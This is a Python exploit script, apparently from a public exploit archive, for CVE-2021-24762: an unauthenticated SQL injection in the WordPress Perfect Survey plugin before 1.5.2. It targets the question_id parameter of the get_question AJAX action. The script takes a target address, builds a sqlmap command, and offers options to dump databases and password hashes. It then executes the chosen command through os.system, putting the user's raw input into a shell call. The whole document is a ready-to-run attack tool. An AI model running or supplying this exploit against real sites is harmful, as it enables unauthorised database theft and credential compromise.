# Exploit Title: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated) # Date 18.02.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.getperfectsurvey.com/ # Software Link: https://web.archive.org/web/20210817031040/https://downloads.wordpress.org/plugin/perfect-survey.1.5.1.zip # Version: < 1.5.2 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-24762 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24762/README.md ''' Description: The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection. ''' banner = ''' ___ _ _ ______ ____ ____ ____ ___ ____ _ _ _______ _____ ____ _(___)_ (_) (_)(______) _(____) (____) _(____) (___) _(____)(_) (_)(_______)(_____) _(____) (_) (_)(_) (_)(_)__ ______(_) _(_)(_) (_)(_) _(_)(_)(_) ______(_) _(_)(_)__(_)_ _(_)(_)___ (_) _(_) (_) _ (_) (_)(____)(______) _(_) (_) (_) _(_) (_)(______) _(_) (________)_(_) (_____)_ _(_) (_)___(_) (_)_(_) (_)____ (_)___ (_)__(_) (_)___ (_) (_)___ (_) (_) (_)___(_)(_)___ (___) (___) (______) (______) (____) (______) (_) (______) (_)(_) (_____)(______) [+] Perfect Survey - SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse from datetime import datetime import os # User-Input: my_parser = argparse.ArgumentParser(description= 'Perfect Survey - SQL-Injection (unauthenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('[*] Payload for SQL-Injection:') exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=get_question&question_id=1 *" ' print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))